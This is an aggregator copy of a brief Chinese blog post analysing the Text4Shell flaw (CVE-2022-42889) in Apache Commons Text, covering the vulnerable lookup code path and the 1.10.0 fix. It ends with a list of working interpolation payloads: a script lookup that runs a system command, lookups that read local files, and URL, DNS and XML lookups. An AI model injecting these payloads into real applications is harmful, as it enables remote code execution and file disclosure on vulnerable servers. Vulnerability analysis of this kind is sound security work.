4

CVE-2022-42889 Apache Commons Text RCE (Text4Shell)

 1 year ago
source link: https://y4er.com/posts/cve-2022-42889-apache-commons-text-rce/
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
neoserver,ios ssh client

CVE-2022-42889 Apache Commons Text RCE (Text4Shell)

 2022-10-13  2022-10-13  约 394 字   预计阅读 1 分钟 

https://twitter.com/Y4tacker/status/1580193254665920513?s=20&t=mq9URhmKSa7xADbSY4r2fw

看到了这个推特,于是自己看了一眼。

1.9有一个script的标签

https://commons.apache.org/proper/commons-text/apidocs/org/apache/commons/text/lookup/StringLookupFactory.html

https://y4er.com/img/uploads/CVE-2022-42889-apache-commons-text-rce/1.png

org.apache.commons.text.lookup.InterpolatorStringLookup#lookup

https://y4er.com/img/uploads/CVE-2022-42889-apache-commons-text-rce/2.png

切出来key标签script

org.apache.commons.text.lookup.ScriptStringLookup#lookup

https://y4er.com/img/uploads/CVE-2022-42889-apache-commons-text-rce/3.png

调用ScriptEngineManager执行代码。

1.10.0修复在addDefaultStringLookups添加默认lookup时不再添加script、url、dns标签

https://y4er.com/img/uploads/CVE-2022-42889-apache-commons-text-rce/4.png

org.apache.commons.text.lookup.StringLookupFactory.DefaultStringLookupsHolder#createDefaultStringLookups

https://y4er.com/img/uploads/CVE-2022-42889-apache-commons-text-rce/5.png

一些payload

${script:js:java.lang.Runtime.getRuntime().exec('calc')}
${file:utf8:e:/test.txt}
${url:utf8:http://baidu.com}
${url:utf8:file:///e:/test.txt}
${dns:address|baidu.com}
${xml:/tmp/aaa:/xpathexpression}

文笔垃圾,措辞轻浮,内容浅显,操作生疏。不足之处欢迎大师傅们指点和纠正,感激不尽。


report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK